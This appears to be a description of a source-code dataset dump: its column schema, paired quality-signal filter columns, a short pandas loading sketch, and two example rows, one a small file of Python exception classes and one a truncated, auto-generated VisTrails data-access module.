Schema of the dump (113 columns; one row per source file). The first 29 columns carry the file's text and repo metadata:

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |

Each quality signal then appears twice: once as `qsc_<signal>_quality_signal` (the measured value) and once as plain `qsc_<signal>`, which, judging by the 0/1 values in the rows below, appears to record whether the corresponding filter fired:

| Signal | `qsc_<signal>_quality_signal` | `qsc_<signal>` |
|---|---|---|
| code_num_words | int64 | int64 |
| code_num_chars | float64 | int64 |
| code_mean_word_length | float64 | int64 |
| code_frac_words_unique | float64 | null |
| code_frac_chars_top_2grams | float64 | int64 |
| code_frac_chars_top_3grams | float64 | int64 |
| code_frac_chars_top_4grams | float64 | int64 |
| code_frac_chars_dupe_5grams | float64 | int64 |
| code_frac_chars_dupe_6grams | float64 | int64 |
| code_frac_chars_dupe_7grams | float64 | int64 |
| code_frac_chars_dupe_8grams | float64 | int64 |
| code_frac_chars_dupe_9grams | float64 | int64 |
| code_frac_chars_dupe_10grams | float64 | int64 |
| code_frac_chars_replacement_symbols | float64 | int64 |
| code_frac_chars_digital | float64 | int64 |
| code_frac_chars_whitespace | float64 | int64 |
| code_size_file_byte | float64 | int64 |
| code_num_lines | float64 | int64 |
| code_num_chars_line_max | float64 | int64 |
| code_num_chars_line_mean | float64 | int64 |
| code_frac_chars_alphabet | float64 | int64 |
| code_frac_chars_comments | float64 | int64 |
| code_cate_xml_start | float64 | int64 |
| code_frac_lines_dupe_lines | float64 | int64 |
| code_cate_autogen | float64 | int64 |
| code_frac_lines_long_string | float64 | int64 |
| code_frac_chars_string_length | float64 | int64 |
| code_frac_chars_long_word_length | float64 | int64 |
| code_frac_lines_string_concat | float64 | null |
| code_cate_encoded_data | float64 | int64 |
| code_frac_chars_hex_words | float64 | int64 |
| code_frac_lines_prompt_comments | float64 | int64 |
| code_frac_lines_assert | float64 | int64 |
| codepython_cate_ast | float64 | int64 |
| codepython_frac_lines_func_ratio | float64 | int64 |
| codepython_cate_var_zero | bool | int64 |
| codepython_frac_lines_pass | float64 | int64 |
| codepython_frac_lines_import | float64 | int64 |
| codepython_frac_lines_simplefunc | float64 | int64 |
| codepython_score_lines_no_logic | float64 | int64 |
| codepython_frac_lines_print | float64 | int64 |

The final two columns are `effective` (string) and `hits` (int64).
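Nothing in the dump itself documents how these columns are meant to be consumed, but the layout suggests the usual Parquet workflow. Below is a minimal sketch with pandas, assuming the rows ship as Parquet shards (the filename is hypothetical) and that a nonzero `qsc_*` value marks a fired filter:

```python
import pandas as pd

# Hypothetical shard name; substitute a real file from the dump.
df = pd.read_parquet("shard-00000.parquet")

# Repo metadata and raw text sit alongside the quality signals.
print(df[["max_stars_repo_name", "max_stars_repo_path", "size", "lang"]].head())

# The paired qsc_* columns (no _quality_signal suffix) hold 0/1/null values;
# assuming 1 means "filter fired", keep only rows that trip no filter at all.
flag_cols = [c for c in df.columns
             if c.startswith("qsc_") and not c.endswith("_quality_signal")]
clean = df[df[flag_cols].fillna(0).sum(axis=1) == 0]
print(f"{len(clean)}/{len(df)} rows pass every filter")
```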
The two example rows below are shown field by field. Row 1, `src/BearSki/utils/errors.py`:

| Field | Value |
|---|---|
| hexsha | 1ce26c983b25795b8344d1afedd8fab6e03cc8ff |
| size | 463 |
| ext | py |
| lang | Python |
| max_stars_repo_path | src/BearSki/utils/errors.py |
| max_stars_repo_name | Sirius1942/BearSki |
| max_stars_repo_head_hexsha | bdc75d6f06946896e2128f1c095b9baf9863b124 |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | 13 |
| max_stars_repo_stars_event_min_datetime | 2019-12-10T09:07:45.000Z |
| max_stars_repo_stars_event_max_datetime | 2021-09-08T01:24:22.000Z |
| max_issues_repo_path | src/BearSki/utils/errors.py |
| max_issues_repo_name | Sirius1942/BearSki |
| max_issues_repo_head_hexsha | bdc75d6f06946896e2128f1c095b9baf9863b124 |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | 1 |
| max_issues_repo_issues_event_min_datetime | 2020-05-06T01:43:50.000Z |
| max_issues_repo_issues_event_max_datetime | 2020-05-06T01:44:46.000Z |
| max_forks_repo_path | build/lib/BearSki/utils/errors.py |
| max_forks_repo_name | Sirius1942/BearSki |
| max_forks_repo_head_hexsha | bdc75d6f06946896e2128f1c095b9baf9863b124 |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | 6 |
| max_forks_repo_forks_event_min_datetime | 2020-01-07T07:07:42.000Z |
| max_forks_repo_forks_event_max_datetime | 2021-06-04T03:38:19.000Z |

`content` (463 bytes; the two comments are translated from Chinese, and the upstream typo `ArgmentError` is preserved verbatim):

```python
# Exception when retrieving arguments
class ArgmentError(Exception):
def __init__(self, expression, message):
self.expression = expression
self.message = message
# Exception when reading the settings file
class SettingFileError(Exception):
def __init__(self, expression, message):
self.expression = expression
self.message = message
class DataBaseError(Exception):
def __init__(self, expression, message):
self.expression = expression
self.message = message
```

Surface statistics and quality signals for row 1 (measured value, then the paired `qsc_<signal>` filter column):

| Field | Value |
|---|---|
| avg_line_length | 20.130435 |
| max_line_length | 44 |
| alphanum_fraction | 0.688985 |

| Quality signal | Value | `qsc_<signal>` |
|---|---|---|
| code_num_words | 44 | 0 |
| code_num_chars | 463 | 0 |
| code_mean_word_length | 6.977273 | 0 |
| code_frac_words_unique | 0.272727 | null |
| code_frac_chars_top_2grams | 0.273616 | 1 |
| code_frac_chars_top_3grams | 0.156352 | 0 |
| code_frac_chars_top_4grams | 0.19544 | 1 |
| code_frac_chars_dupe_5grams | 0.771987 | 0 |
| code_frac_chars_dupe_6grams | 0.771987 | 1 |
| code_frac_chars_dupe_7grams | 0.771987 | 1 |
| code_frac_chars_dupe_8grams | 0.771987 | 1 |
| code_frac_chars_dupe_9grams | 0.771987 | 1 |
| code_frac_chars_dupe_10grams | 0.771987 | 1 |
| code_frac_chars_replacement_symbols | 0 | 0 |
| code_frac_chars_digital | 0 | 0 |
| code_frac_chars_whitespace | 0.228942 | 0 |
| code_size_file_byte | 463 | 0 |
| code_num_lines | 22 | 0 |
| code_num_chars_line_max | 45 | 0 |
| code_num_chars_line_mean | 21.045455 | 0 |
| code_frac_chars_alphabet | 0.859944 | 0 |
| code_frac_chars_comments | 0.030238 | 0 |
| code_cate_xml_start | 0 | 0 |
| code_frac_lines_dupe_lines | 0.75 | 1 |
| code_cate_autogen | 0 | 0 |
| code_frac_lines_long_string | 0 | 0 |
| code_frac_chars_string_length | 0 | 0 |
| code_frac_chars_long_word_length | 0 | 0 |
| code_frac_lines_string_concat | 0 | null |
| code_cate_encoded_data | 0 | 0 |
| code_frac_chars_hex_words | 0 | 0 |
| code_frac_lines_prompt_comments | 0 | 0 |
| code_frac_lines_assert | 0 | 0 |
| codepython_cate_ast | 1 | 0 |
| codepython_frac_lines_func_ratio | 0.25 | 1 |
| codepython_cate_var_zero | false | 0 |
| codepython_frac_lines_pass | 0 | 0 |
| codepython_frac_lines_import | 0 | 0 |
| codepython_frac_lines_simplefunc | 0 | 0 |
| codepython_score_lines_no_logic | 0.5 | 0 |
| codepython_frac_lines_print | 0 | 0 |

`effective`: "0" · `hits`: 9
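A file this small makes the surface-level signals easy to sanity-check. The sketch below re-derives a few of them using definitions inferred from the column names; these are assumptions, not the dump's actual code (for instance, `code_num_chars` equals the byte size here, so the real counter may work on bytes rather than Unicode characters, and the content above renders as 14 lines while `code_num_lines` records 22, so blank lines were probably lost in flattening):

```python
# Assumed definitions for a few of the simpler quality signals, inferred
# from their names; not the dump's actual implementation.
def simple_signals(content: str) -> dict:
    lines = content.splitlines()
    words = content.split()
    return {
        "num_chars": len(content.encode("utf-8")),   # byte count, to match size
        "num_lines": len(lines),
        "num_chars_line_max": max(len(line) for line in lines),
        "mean_word_length": sum(map(len, words)) / len(words),
        "frac_words_unique": len(set(words)) / len(words),
        "frac_chars_whitespace": sum(c.isspace() for c in content) / len(content),
    }
```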
Row 2, `vistrails/db/versions/v0_9_5/domain/auto_gen.py`:

| Field | Value |
|---|---|
| hexsha | 1ce9691c438083a52850c38dd26867a1d4a1ae2a |
| size | 320510 |
| ext | py |
| lang | Python |
| max_stars_repo_path | vistrails/db/versions/v0_9_5/domain/auto_gen.py |
| max_stars_repo_name | remram44/VisTrails-mybinder |
| max_stars_repo_head_hexsha | ee7477b471920d738f3ac430932f01901b56ed44 |
| max_stars_repo_licenses | ["BSD-3-Clause"] |
| max_stars_count | 83 |
| max_stars_repo_stars_event_min_datetime | 2015-01-05T14:50:50.000Z |
| max_stars_repo_stars_event_max_datetime | 2021-09-17T19:45:26.000Z |
| max_issues_repo_path | vistrails/db/versions/v0_9_5/domain/auto_gen.py |
| max_issues_repo_name | remram44/VisTrails-mybinder |
| max_issues_repo_head_hexsha | ee7477b471920d738f3ac430932f01901b56ed44 |
| max_issues_repo_licenses | ["BSD-3-Clause"] |
| max_issues_count | 254 |
| max_issues_repo_issues_event_min_datetime | 2015-01-02T20:39:19.000Z |
| max_issues_repo_issues_event_max_datetime | 2018-11-28T17:16:44.000Z |
| max_forks_repo_path | vistrails/db/versions/v0_9_5/domain/auto_gen.py |
| max_forks_repo_name | remram44/VisTrails-mybinder |
| max_forks_repo_head_hexsha | ee7477b471920d738f3ac430932f01901b56ed44 |
| max_forks_repo_licenses | ["BSD-3-Clause"] |
| max_forks_count | 40 |
| max_forks_repo_forks_event_min_datetime | 2015-04-17T16:46:36.000Z |
| max_forks_repo_forks_event_max_datetime | 2021-09-28T22:43:24.000Z |

`content` (320510 bytes of Python 2 code, shown verbatim and truncated below):

```python
###############################################################################
##
## Copyright (C) 2014-2016, New York University.
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the New York University nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
"""generated automatically by auto_dao.py"""
from __future__ import division
import copy
class DBPortSpec(object):
vtType = 'portSpec'
def __init__(self, id=None, name=None, type=None, optional=None, sort_key=None, sigstring=None):
self._db_id = id
self._db_name = name
self._db_type = type
self._db_optional = optional
self._db_sort_key = sort_key
self._db_sigstring = sigstring
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBPortSpec.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBPortSpec(id=self._db_id,
name=self._db_name,
type=self._db_type,
optional=self._db_optional,
sort_key=self._db_sort_key,
sigstring=self._db_sigstring)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBPortSpec()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'type' in class_dict:
res = class_dict['type'](old_obj, trans_dict)
new_obj.db_type = res
elif hasattr(old_obj, 'db_type') and old_obj.db_type is not None:
new_obj.db_type = old_obj.db_type
if 'optional' in class_dict:
res = class_dict['optional'](old_obj, trans_dict)
new_obj.db_optional = res
elif hasattr(old_obj, 'db_optional') and old_obj.db_optional is not None:
new_obj.db_optional = old_obj.db_optional
if 'sort_key' in class_dict:
res = class_dict['sort_key'](old_obj, trans_dict)
new_obj.db_sort_key = res
elif hasattr(old_obj, 'db_sort_key') and old_obj.db_sort_key is not None:
new_obj.db_sort_key = old_obj.db_sort_key
if 'sigstring' in class_dict:
res = class_dict['sigstring'](old_obj, trans_dict)
new_obj.db_sigstring = res
elif hasattr(old_obj, 'db_sigstring') and old_obj.db_sigstring is not None:
new_obj.db_sigstring = old_obj.db_sigstring
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_type(self):
return self._db_type
def __set_db_type(self, type):
self._db_type = type
self.is_dirty = True
db_type = property(__get_db_type, __set_db_type)
def db_add_type(self, type):
self._db_type = type
def db_change_type(self, type):
self._db_type = type
def db_delete_type(self, type):
self._db_type = None
def __get_db_optional(self):
return self._db_optional
def __set_db_optional(self, optional):
self._db_optional = optional
self.is_dirty = True
db_optional = property(__get_db_optional, __set_db_optional)
def db_add_optional(self, optional):
self._db_optional = optional
def db_change_optional(self, optional):
self._db_optional = optional
def db_delete_optional(self, optional):
self._db_optional = None
def __get_db_sort_key(self):
return self._db_sort_key
def __set_db_sort_key(self, sort_key):
self._db_sort_key = sort_key
self.is_dirty = True
db_sort_key = property(__get_db_sort_key, __set_db_sort_key)
def db_add_sort_key(self, sort_key):
self._db_sort_key = sort_key
def db_change_sort_key(self, sort_key):
self._db_sort_key = sort_key
def db_delete_sort_key(self, sort_key):
self._db_sort_key = None
def __get_db_sigstring(self):
return self._db_sigstring
def __set_db_sigstring(self, sigstring):
self._db_sigstring = sigstring
self.is_dirty = True
db_sigstring = property(__get_db_sigstring, __set_db_sigstring)
def db_add_sigstring(self, sigstring):
self._db_sigstring = sigstring
def db_change_sigstring(self, sigstring):
self._db_sigstring = sigstring
def db_delete_sigstring(self, sigstring):
self._db_sigstring = None
def getPrimaryKey(self):
return self._db_id
class DBModule(object):
vtType = 'module'
def __init__(self, id=None, cache=None, name=None, namespace=None, package=None, version=None, tag=None, location=None, functions=None, annotations=None, portSpecs=None):
self._db_id = id
self._db_cache = cache
self._db_name = name
self._db_namespace = namespace
self._db_package = package
self._db_version = version
self._db_tag = tag
self.db_deleted_location = []
self._db_location = location
self.db_deleted_functions = []
self.db_functions_id_index = {}
if functions is None:
self._db_functions = []
else:
self._db_functions = functions
for v in self._db_functions:
self.db_functions_id_index[v.db_id] = v
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
self.db_annotations_key_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_annotations_key_index[v.db_key] = v
self.db_deleted_portSpecs = []
self.db_portSpecs_id_index = {}
self.db_portSpecs_name_index = {}
if portSpecs is None:
self._db_portSpecs = []
else:
self._db_portSpecs = portSpecs
for v in self._db_portSpecs:
self.db_portSpecs_id_index[v.db_id] = v
self.db_portSpecs_name_index[(v.db_name,v.db_type)] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBModule.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBModule(id=self._db_id,
cache=self._db_cache,
name=self._db_name,
namespace=self._db_namespace,
package=self._db_package,
version=self._db_version,
tag=self._db_tag)
if self._db_location is not None:
cp._db_location = self._db_location.do_copy(new_ids, id_scope, id_remap)
if self._db_functions is None:
cp._db_functions = []
else:
cp._db_functions = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_functions]
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
if self._db_portSpecs is None:
cp._db_portSpecs = []
else:
cp._db_portSpecs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_portSpecs]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_functions_id_index = dict((v.db_id, v) for v in cp._db_functions)
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_annotations_key_index = dict((v.db_key, v) for v in cp._db_annotations)
cp.db_portSpecs_id_index = dict((v.db_id, v) for v in cp._db_portSpecs)
cp.db_portSpecs_name_index = dict(((v.db_name,v.db_type), v) for v in cp._db_portSpecs)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBModule()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'cache' in class_dict:
res = class_dict['cache'](old_obj, trans_dict)
new_obj.db_cache = res
elif hasattr(old_obj, 'db_cache') and old_obj.db_cache is not None:
new_obj.db_cache = old_obj.db_cache
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'namespace' in class_dict:
res = class_dict['namespace'](old_obj, trans_dict)
new_obj.db_namespace = res
elif hasattr(old_obj, 'db_namespace') and old_obj.db_namespace is not None:
new_obj.db_namespace = old_obj.db_namespace
if 'package' in class_dict:
res = class_dict['package'](old_obj, trans_dict)
new_obj.db_package = res
elif hasattr(old_obj, 'db_package') and old_obj.db_package is not None:
new_obj.db_package = old_obj.db_package
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'tag' in class_dict:
res = class_dict['tag'](old_obj, trans_dict)
new_obj.db_tag = res
elif hasattr(old_obj, 'db_tag') and old_obj.db_tag is not None:
new_obj.db_tag = old_obj.db_tag
if 'location' in class_dict:
res = class_dict['location'](old_obj, trans_dict)
new_obj.db_location = res
elif hasattr(old_obj, 'db_location') and old_obj.db_location is not None:
obj = old_obj.db_location
new_obj.db_add_location(DBLocation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_location') and hasattr(new_obj, 'db_deleted_location'):
for obj in old_obj.db_deleted_location:
n_obj = DBLocation.update_version(obj, trans_dict)
new_obj.db_deleted_location.append(n_obj)
if 'functions' in class_dict:
res = class_dict['functions'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_function(obj)
elif hasattr(old_obj, 'db_functions') and old_obj.db_functions is not None:
for obj in old_obj.db_functions:
new_obj.db_add_function(DBFunction.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_functions') and hasattr(new_obj, 'db_deleted_functions'):
for obj in old_obj.db_deleted_functions:
n_obj = DBFunction.update_version(obj, trans_dict)
new_obj.db_deleted_functions.append(n_obj)
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
if 'portSpecs' in class_dict:
res = class_dict['portSpecs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_portSpec(obj)
elif hasattr(old_obj, 'db_portSpecs') and old_obj.db_portSpecs is not None:
for obj in old_obj.db_portSpecs:
new_obj.db_add_portSpec(DBPortSpec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_portSpecs') and hasattr(new_obj, 'db_deleted_portSpecs'):
for obj in old_obj.db_deleted_portSpecs:
n_obj = DBPortSpec.update_version(obj, trans_dict)
new_obj.db_deleted_portSpecs.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
if self._db_location is not None:
children.extend(self._db_location.db_children((self.vtType, self.db_id), orphan))
if orphan:
self._db_location = None
to_del = []
for child in self.db_functions:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_function(child)
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
to_del = []
for child in self.db_portSpecs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_portSpec(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_location)
children.extend(self.db_deleted_functions)
children.extend(self.db_deleted_annotations)
children.extend(self.db_deleted_portSpecs)
if remove:
self.db_deleted_location = []
self.db_deleted_functions = []
self.db_deleted_annotations = []
self.db_deleted_portSpecs = []
return children
def has_changes(self):
if self.is_dirty:
return True
if self._db_location is not None and self._db_location.has_changes():
return True
for child in self._db_functions:
if child.has_changes():
return True
for child in self._db_annotations:
if child.has_changes():
return True
for child in self._db_portSpecs:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_cache(self):
return self._db_cache
def __set_db_cache(self, cache):
self._db_cache = cache
self.is_dirty = True
db_cache = property(__get_db_cache, __set_db_cache)
def db_add_cache(self, cache):
self._db_cache = cache
def db_change_cache(self, cache):
self._db_cache = cache
def db_delete_cache(self, cache):
self._db_cache = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_namespace(self):
return self._db_namespace
def __set_db_namespace(self, namespace):
self._db_namespace = namespace
self.is_dirty = True
db_namespace = property(__get_db_namespace, __set_db_namespace)
def db_add_namespace(self, namespace):
self._db_namespace = namespace
def db_change_namespace(self, namespace):
self._db_namespace = namespace
def db_delete_namespace(self, namespace):
self._db_namespace = None
def __get_db_package(self):
return self._db_package
def __set_db_package(self, package):
self._db_package = package
self.is_dirty = True
db_package = property(__get_db_package, __set_db_package)
def db_add_package(self, package):
self._db_package = package
def db_change_package(self, package):
self._db_package = package
def db_delete_package(self, package):
self._db_package = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_tag(self):
return self._db_tag
def __set_db_tag(self, tag):
self._db_tag = tag
self.is_dirty = True
db_tag = property(__get_db_tag, __set_db_tag)
def db_add_tag(self, tag):
self._db_tag = tag
def db_change_tag(self, tag):
self._db_tag = tag
def db_delete_tag(self, tag):
self._db_tag = None
def __get_db_location(self):
return self._db_location
def __set_db_location(self, location):
self._db_location = location
self.is_dirty = True
db_location = property(__get_db_location, __set_db_location)
def db_add_location(self, location):
self._db_location = location
def db_change_location(self, location):
self._db_location = location
def db_delete_location(self, location):
if not self.is_new:
self.db_deleted_location.append(self._db_location)
self._db_location = None
def __get_db_functions(self):
return self._db_functions
def __set_db_functions(self, functions):
self._db_functions = functions
self.is_dirty = True
db_functions = property(__get_db_functions, __set_db_functions)
def db_get_functions(self):
return self._db_functions
def db_add_function(self, function):
self.is_dirty = True
self._db_functions.append(function)
self.db_functions_id_index[function.db_id] = function
def db_change_function(self, function):
self.is_dirty = True
found = False
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == function.db_id:
self._db_functions[i] = function
found = True
break
if not found:
self._db_functions.append(function)
self.db_functions_id_index[function.db_id] = function
def db_delete_function(self, function):
self.is_dirty = True
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == function.db_id:
if not self._db_functions[i].is_new:
self.db_deleted_functions.append(self._db_functions[i])
del self._db_functions[i]
break
del self.db_functions_id_index[function.db_id]
def db_get_function(self, key):
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == key:
return self._db_functions[i]
return None
def db_get_function_by_id(self, key):
return self.db_functions_id_index[key]
def db_has_function_with_id(self, key):
return key in self.db_functions_id_index
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
del self.db_annotations_key_index[annotation.db_key]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def db_get_annotation_by_key(self, key):
return self.db_annotations_key_index[key]
def db_has_annotation_with_key(self, key):
return key in self.db_annotations_key_index
def __get_db_portSpecs(self):
return self._db_portSpecs
def __set_db_portSpecs(self, portSpecs):
self._db_portSpecs = portSpecs
self.is_dirty = True
db_portSpecs = property(__get_db_portSpecs, __set_db_portSpecs)
def db_get_portSpecs(self):
return self._db_portSpecs
def db_add_portSpec(self, portSpec):
self.is_dirty = True
self._db_portSpecs.append(portSpec)
self.db_portSpecs_id_index[portSpec.db_id] = portSpec
self.db_portSpecs_name_index[(portSpec.db_name,portSpec.db_type)] = portSpec
def db_change_portSpec(self, portSpec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_portSpecs)):
if self._db_portSpecs[i].db_id == portSpec.db_id:
self._db_portSpecs[i] = portSpec
found = True
break
if not found:
self._db_portSpecs.append(portSpec)
